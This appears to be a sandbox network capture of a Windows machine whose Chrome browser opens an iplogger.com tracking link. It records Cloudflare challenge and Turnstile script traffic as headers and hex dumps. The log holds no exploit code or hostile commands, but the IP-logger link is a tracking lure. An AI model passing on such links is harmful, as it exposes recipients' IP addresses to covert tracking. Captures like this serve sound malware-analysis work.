2024-10-03 14:09:22 UTC | 470 | OUT | POST /report/v4?s=pxV1pun6Odl5bdgZBWOVUjaqoZSnytH0ktSOuDwxstcebwZJv7QxCFrA975IpNydkNjpmdlUL%2BeEqF5Mvm8Ff7RkSMM9uw40RxJXZZeeBq6mD8njDcipAzlQbMKcRqU%3D HTTP/1.1
Host: a.nel.cloudflare.com
Connection: keep-alive
Content-Length: 391
Content-Type: application/reports+json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-10-03 14:09:22 UTC | 391 | OUT | Data Ascii: [{"age":20,"body":{"elapsed_time":1355,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"172.67.188.178","status_code":403,"type":"http.error"},"type":"network-error","url":"https://iplogger.com/
2024-10-03 14:09:22 UTC | 168 | IN | HTTP/1.1 200 OK
Content-Length: 0
date: Thu, 03 Oct 2024 14:09:22 GMT
Via: 1.1 google
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.6 | 49722 | 172.67.188.178 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:23 UTC | 945 | OUT | GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8ccd8274b9e442c9 HTTP/1.1
Host: iplogger.com
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "117.0.5938.134"
sec-ch-ua-platform-version: "10.0.0"
sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
sec-ch-ua-bitness: "64"
sec-ch-ua-model: ""
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                Referer: https://iplogger.com/1KhnJ4?__cf_chl_rt_tk=uzgDrbo7G9tR40KRb5FXyZ9uJF.2cqXfIjT9C.Swxlo-1727964562-0.0.1.1-5246
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
2024-10-03 14:09:23 UTC | 620 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:23 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                Content-Length: 163870
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DkGN3n97aQPEMfyWhF1tKGApZ%2FEmqToeQxVOTri%2Fg63x247jJCMFRnJfWWKiTDQlIU8hsryhyoPmAKli0LUh9oabG3C6PCpxwYLZGCjya18x0jHItOD14mzX7zOHR5U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd827bfde40f97-EWR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.6 | 49723 | 104.18.94.41 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:24 UTC | 580 | OUT | GET /turnstile/v0/g/ec4b873d446c/api.js?onload=Jeuhg1&render=explicit HTTP/1.1
                                                                                                                                                                                                                                                Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                Origin: https://iplogger.com
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
2024-10-03 14:09:24 UTC | 441 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:24 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                Content-Length: 47262
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                                                                last-modified: Tue, 17 Sep 2024 16:06:37 GMT
                                                                                                                                                                                                                                                cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd82818e75de99-EWR


Session ID: 9
Source IP: 192.168.2.6
Source Port: 49727
Destination IP: 172.67.188.178
Destination Port: 443
PID: 6088
Process: C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp  Bytes transferred  Direction  Data
2024-10-03 14:09:25 UTC  1054  OUT  POST /cdn-cgi/challenge-platform/h/g/flow/ov1/1787772256:1727962003:iWCRLIu4ZygN5hNL9RXktFOgCDxm7GLFIz5ri-9QP5c/8ccd8274b9e442c9/79895931bf779a4 HTTP/1.1
                                                                                                                                                                                                                                                Host: iplogger.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Content-Length: 1879
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                Content-type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                sec-ch-ua-model: ""
                                                                                                                                                                                                                                                CF-Challenge: 79895931bf779a4
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Origin: https://iplogger.com
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Referer: https://iplogger.com/1KhnJ4
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
2024-10-03 14:09:25 UTC  611  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:25 GMT
                                                                                                                                                                                                                                                Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                                Content-Length: 16760
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cf-chl-gen: l5Kqgea1RepQV68+UJea/2iv8IatLLnU2Uw28TRqIOOjHQFZAw3HH4/vQkrMBgjbVEwpGg2uAA==$yD+/On7TFsnvUyKb
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dNp7dKkm5prnegS45A3rCUs9gUfwKqTAziEgoMv6XeB4RAki4XyrJDOCEUwtueGzsr2XyCA5XEGTT4ex5iXibvKyzWJBEEHhdJoGMwhG3I3Y2itPMuVLdLxVxezO3eg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd82844b570f85-EWR
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC1369INData Raw: 66 75 36 77 72 6e 2b 66 62 37 32 78 77 45 46 75 38 6b 47 75 59 43 38 2b 67 57 42 65 77 61 4a 69 6f 71 42 69 59 30 46 68 51 62 4e 52 4d 4a 44 42 49 54 46 67 49 53 50 54 45 37 4a 77 45 66 42 45 73 4b 46 54 74 4e 44 7a 34 74 54 51 38 75 46 52 51 53 56 6a 51 35 45 6c 73 51 48 69 30 68 57 31 63 39 54 69 35 6e 4a 56 6b 6c 4e 6a 52 72 51 6a 6f 34 62 30 59 2b 4b 6e 42 6b 55 53 6f 76 4e 56 63 75 61 6c 6c 65 50 6e 4a 57 58 45 4e 77 68 48 78 56 57 6d 68 45 61 6c 56 5a 59 49 79 4c 6a 32 53 56 69 59 4b 58 68 4a 56 73 69 4a 42 76 69 6e 2b 59 6f 46 78 75 58 6e 4e 33 6c 48 46 7a 66 58 64 34 71 33 6c 6c 66 4b 39 36 6a 57 71 51 70 48 2b 44 6b 70 6c 36 69 4c 75 47 69 4a 57 75 69 6e 36 36 6d 36 57 76 68 72 54 44 77 71 6d 4a 77 34 47 38 6f 49 71 70 6b 36 57 6e 73 4c 54 4d 74
                                                                                                                                                                                                                                                Data Ascii: fu6wrn+fb72xwEFu8kGuYC8+gWBewaJioqBiY0FhQbNRMJDBITFgISPTE7JwEfBEsKFTtNDz4tTQ8uFRQSVjQ5ElsQHi0hW1c9Ti5nJVklNjRrQjo4b0Y+KnBkUSovNVcuallePnJWXENwhHxVWmhEalVZYIyLj2SViYKXhJVsiJBvin+YoFxuXnN3lHFzfXd4q3llfK96jWqQpH+Dkpl6iLuGiJWuin66m6WvhrTDwqmJw4G8oIqpk6WnsLTMt
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC1369INData Raw: 36 41 64 34 64 47 42 2f 68 42 67 67 67 36 74 37 72 4b 77 67 6d 41 50 49 42 4b 65 30 76 46 76 44 78 47 69 55 4f 2f 54 4d 67 48 7a 67 67 46 44 77 59 45 53 49 78 45 78 6b 62 4b 79 73 69 44 68 6b 4e 51 45 38 30 4c 42 49 6e 4a 31 56 54 52 44 73 37 56 55 67 5a 48 6c 52 43 56 7a 39 49 49 32 46 4b 59 79 52 67 54 47 63 73 52 79 68 70 4d 6e 45 73 61 54 45 78 56 6e 46 4a 56 44 78 57 50 48 78 36 4f 32 42 67 66 47 4e 51 61 45 5a 48 58 6b 31 4e 68 33 74 69 66 55 74 4f 6c 59 4f 44 63 47 47 46 5a 4a 70 59 57 48 47 4a 6c 35 52 77 62 31 31 34 5a 71 56 6e 70 4b 70 70 66 71 79 45 6f 36 32 51 6f 57 61 4a 70 71 5a 71 68 70 6d 33 68 34 5a 33 74 48 36 79 75 72 61 45 64 38 4e 39 65 6e 75 69 77 63 6d 2b 74 35 75 5a 69 73 61 54 6e 4a 4f 54 73 74 44 51 31 62 71 53 7a 36 6e 53 77 4e
                                                                                                                                                                                                                                                Data Ascii: 6Ad4dGB/hBggg6t7rKwgmAPIBKe0vFvDxGiUO/TMgHzggFDwYESIxExkbKysiDhkNQE80LBInJ1VTRDs7VUgZHlRCVz9II2FKYyRgTGcsRyhpMnEsaTExVnFJVDxWPHx6O2BgfGNQaEZHXk1Nh3tifUtOlYODcGGFZJpYWHGJl5Rwb114ZqVnpKppfqyEo62QoWaJpqZqhpm3h4Z3tH6yuraEd8N9enuiwcm+t5uZisaTnJOTstDQ1bqSz6nSwN
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC1369INData Raw: 4b 67 63 49 41 68 38 63 4a 66 30 77 48 42 4d 42 4e 43 54 30 43 44 6b 58 45 52 45 73 4c 43 41 63 47 78 6f 74 45 68 38 64 41 79 49 34 4f 45 77 65 4a 6a 38 50 49 31 4a 4d 55 53 59 75 55 54 4d 73 49 30 30 31 4d 56 30 79 55 78 59 38 58 47 41 78 56 6a 6f 67 51 69 41 70 59 44 35 63 57 55 68 41 63 6c 4a 55 51 6a 39 4b 4e 30 5a 55 56 6d 52 51 62 33 46 5a 57 56 78 57 67 44 70 79 64 56 74 63 55 6e 68 48 58 6c 5a 35 5a 32 47 52 5a 6e 4a 4b 62 57 36 51 5a 59 6d 49 65 6d 74 6d 6a 57 70 30 6f 58 64 32 67 4a 56 2b 59 58 6c 79 6c 4b 79 49 6e 4b 53 50 59 6e 79 48 68 4a 43 42 71 48 43 47 71 5a 61 38 6a 37 79 72 66 4a 57 4d 72 4c 2b 56 78 4d 43 39 6d 34 47 69 6c 36 6a 4d 78 49 65 65 30 6f 6e 46 69 71 2b 4d 6b 61 61 50 6c 4a 61 78 70 74 75 65 76 4d 37 52 74 62 7a 6c 31 62 4f
                                                                                                                                                                                                                                                Data Ascii: KgcIAh8cJf0wHBMBNCT0CDkXEREsLCAcGxotEh8dAyI4OEweJj8PI1JMUSYuUTMsI001MV0yUxY8XGAxVjogQiApYD5cWUhAclJUQj9KN0ZUVmRQb3FZWVxWgDpydVtcUnhHXlZ5Z2GRZnJKbW6QZYmIemtmjWp0oXd2gJV+YXlylKyInKSPYnyHhJCBqHCGqZa8j7yrfJWMrL+VxMC9m4Gil6jMxIee0onFiq+MkaaPlJaxptuevM7Rtbzl1bO
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC1369INData Raw: 68 45 76 4b 69 34 79 43 53 6f 66 4c 50 59 6a 45 7a 44 30 4c 50 6e 38 2b 79 7a 39 48 69 41 39 49 43 55 6c 42 69 41 69 47 55 4d 35 44 46 49 2b 4e 43 63 74 53 43 59 58 52 45 39 56 45 6b 77 74 53 68 31 50 4c 6a 45 68 46 30 45 5a 51 6a 46 63 56 47 6c 46 5a 79 73 35 62 6a 45 2b 4a 6d 41 73 4e 45 42 32 62 7a 6c 47 55 33 4e 33 4f 30 75 41 58 31 31 42 52 45 64 41 69 46 35 30 52 59 79 48 64 31 6c 52 6b 48 42 66 53 31 43 41 55 4a 61 59 61 6c 71 4d 65 6e 5a 53 62 4a 43 43 62 6c 32 66 70 48 71 70 6d 4b 64 72 68 36 69 6b 68 5a 31 78 72 49 6c 2f 62 62 57 4d 67 36 79 33 6a 62 32 7a 76 6f 2b 4d 69 72 36 53 6a 36 62 45 6c 72 71 5a 79 49 4b 64 76 71 36 66 73 4c 4f 46 77 4c 4f 77 6f 73 6d 74 77 36 37 4b 76 64 36 33 30 4e 66 52 32 4d 57 7a 72 39 44 52 78 39 36 37 7a 62 7a 61
                                                                                                                                                                                                                                                Data Ascii: hEvKi4yCSofLPYjEzD0LPn8+yz9HiA9ICUlBiAiGUM5DFI+NCctSCYXRE9VEkwtSh1PLjEhF0EZQjFcVGlFZys5bjE+JmAsNEB2bzlGU3N3O0uAX11BREdAiF50RYyHd1lRkHBfS1CAUJaYalqMenZSbJCCbl2fpHqpmKdrh6ikhZ1xrIl/bbWMg6y3jb2zvo+Mir6Sj6bElrqZyIKdvq6fsLOFwLOwosmtw67Kvd630NfR2MWzr9DRx967zbza


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.6 | 49729 | 104.21.76.57 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:25 UTC | 411 | OUT | GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_page/v1?ray=8ccd8274b9e442c9 HTTP/1.1
                                                                                                                                                                                                                                                Host: iplogger.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
2024-10-03 14:09:25 UTC | 622 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:25 GMT
                                                                                                                                                                                                                                                Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                Content-Length: 157993
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WRmqyCtHUq2FD3myxZYQ5MzFbU3CQgCU3ShA9XzQtJbcjb9taXzo5uQni4XruzA6IicKxaa%2BCVVAIKO2GwF1obGoCxjm%2BtgyJNC%2Bkr7YnpGxZXBiqB5acXx5s7oR4MY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd8284dd680f7b-EWR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.6 | 49730 | 172.67.188.178 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:25 UTC | 858 | OUT | GET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                                                Host: iplogger.com
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                sec-ch-ua-arch: "x86"
                                                                                                                                                                                                                                                sec-ch-ua-full-version: "117.0.5938.134"
                                                                                                                                                                                                                                                sec-ch-ua-platform-version: "10.0.0"
                                                                                                                                                                                                                                                sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.134", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.134"
                                                                                                                                                                                                                                                sec-ch-ua-bitness: "64"
                                                                                                                                                                                                                                                sec-ch-ua-model: ""
                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                Referer: https://iplogger.com/1KhnJ4
                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC836INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Thu, 03 Oct 2024 14:09:25 GMT
                                                                                                                                                                                                                                                Content-Type: image/x-icon
                                                                                                                                                                                                                                                Content-Length: 2833
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                last-modified: Tue, 07 Jun 2022 11:44:38 GMT
                                                                                                                                                                                                                                                etag: "629f3a26-b11"
                                                                                                                                                                                                                                                strict-transport-security: max-age=604800
                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                content-security-policy: img-src https: data:; upgrade-insecure-requests
                                                                                                                                                                                                                                                x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                                Cache-Control: max-age=14400
                                                                                                                                                                                                                                                CF-Cache-Status: HIT
                                                                                                                                                                                                                                                Age: 4194
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s6r14g6s0T1RrWk2y8Ac0rqnC%2FLVLKf2EBqQ3omkQ6J8Fu5v2uteSLetEpRzPZwZOe3Cty8FaC55S6Ug9Ti7cB8WbEk0McIbvpsM98kwIN1pc5t2ryHR8THhTApRoqQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8ccd82852ccdc32f-EWR


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.6 | 49732 | 104.18.95.41 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:25 UTC | 413 | OUT | GET /turnstile/v0/g/ec4b873d446c/api.js?onload=Jeuhg1&render=explicit HTTP/1.1
Host: challenges.cloudflare.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: */*
Sec-Fetch-Site: none
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-10-03 14:09:25 UTC | 441 | IN | HTTP/1.1 200 OK
Date: Thu, 03 Oct 2024 14:09:25 GMT
Content-Type: application/javascript; charset=UTF-8
Content-Length: 47262
Connection: close
accept-ranges: bytes
last-modified: Tue, 17 Sep 2024 16:06:37 GMT
cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
access-control-allow-origin: *
cross-origin-resource-policy: cross-origin
Server: cloudflare
CF-RAY: 8ccd82860baa18b4-EWR
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC1369INData Raw: 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 71 65 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 73 74 61 72 74 73 57 69 74 68 28 57 65 29 3f 65 2e 73 75 62 73 74 72 69 6e 67 28 57 65 2e 6c 65 6e 67 74 68 29 3a 6e 75 6c 6c 7d 66 75 6e 63 74 69 6f 6e 20 4b 28 65 29 7b 72 65 74 75 72 6e 22 22 2e 63 6f 6e 63 61 74 28 57 65 29 2e 63 6f 6e 63 61 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 29 7b 76 61 72 20 65 3d 2f 5c 2f 74 75 72 6e 73 74 69 6c 65 5c 2f 76 30 28 5c 2f 2e 2a 29 3f 5c 2f 61 70 69 5c 2e 6a 73 2f 2c 72 3d 64 6f 63 75 6d 65 6e 74 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 3b 69 66 28 55 28 72 2c 48 54 4d 4c 53 63 72 69 70 74 45 6c 65 6d 65 6e 74 29 26 26 65 2e 74 65 73 74 28 72
                                                                                                                                                                                                                                                Data Ascii: flare Turnstile] ".concat(e))}function qe(e){return e.startsWith(We)?e.substring(We.length):null}function K(e){return"".concat(We).concat(e)}function Tt(){var e=/\/turnstile\/v0(\/.*)?\/api\.js/,r=document.currentScript;if(U(r,HTMLScriptElement)&&e.test(r
                                                                                                                                                                                                                                                2024-10-03 14:09:25 UTC1369INData Raw: 66 2e 73 74 79 6c 65 2e 62 61 63 6b 67 72 6f 75 6e 64 3d 22 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 34 29 22 3b 76 61 72 20 70 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 70 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 74 61 62 6c 65 2d 63 65 6c 6c 22 2c 70 2e 73 74 79 6c 65 2e 76 65 72 74 69 63 61 6c 41 6c 69 67 6e 3d 22 6d 69 64 64 6c 65 22 2c 70 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 70 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 3b 76 61 72 20 73 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 73 2e 63 6c 61 73 73 4e 61 6d 65 3d 22 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 66 65 65 64 62 61 63 6b 22 2c 73 2e 69 64 3d
                                                                                                                                                                                                                                                Data Ascii: f.style.background="rgba(0,0,0,0.4)";var p=document.createElement("div");p.style.display="table-cell",p.style.verticalAlign="middle",p.style.width="100vw",p.style.height="100vh";var s=document.createElement("div");s.className="cf-turnstile-feedback",s.id=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.6 | 49731 | 184.28.90.27 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:25 UTC | 161 | OUT | HEAD /fs/windows/config.json HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.8
Host: fs.microsoft.com
2024-10-03 14:09:25 UTC | 466 | IN | HTTP/1.1 200 OK
Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
Content-Type: application/octet-stream
ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
Last-Modified: Tue, 16 May 2017 22:58:00 GMT
Server: ECAcc (lpl/EF06)
X-CID: 11
X-Ms-ApiVersion: Distribute 1.2
X-Ms-Region: prod-weu-z1
Cache-Control: public, max-age=25925
Date: Thu, 03 Oct 2024 14:09:25 GMT
Connection: close
X-CID: 2


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.6 | 49733 | 104.18.95.41 | 443 | 6088 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 14:09:25 UTC | 764 | OUT | GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ha9g5/0x4AAAAAAADnPIDROrmt1Wwj/light/fbE/normal/auto/ HTTP/1.1
Host: challenges.cloudflare.com
Connection: keep-alive
sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-Dest: iframe
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-10-03 14:09:26 UTC | 1369 | IN | HTTP/1.1 200 OK
Date: Thu, 03 Oct 2024 14:09:26 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 164856
Connection: close
content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
cross-origin-resource-policy: cross-origin
permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
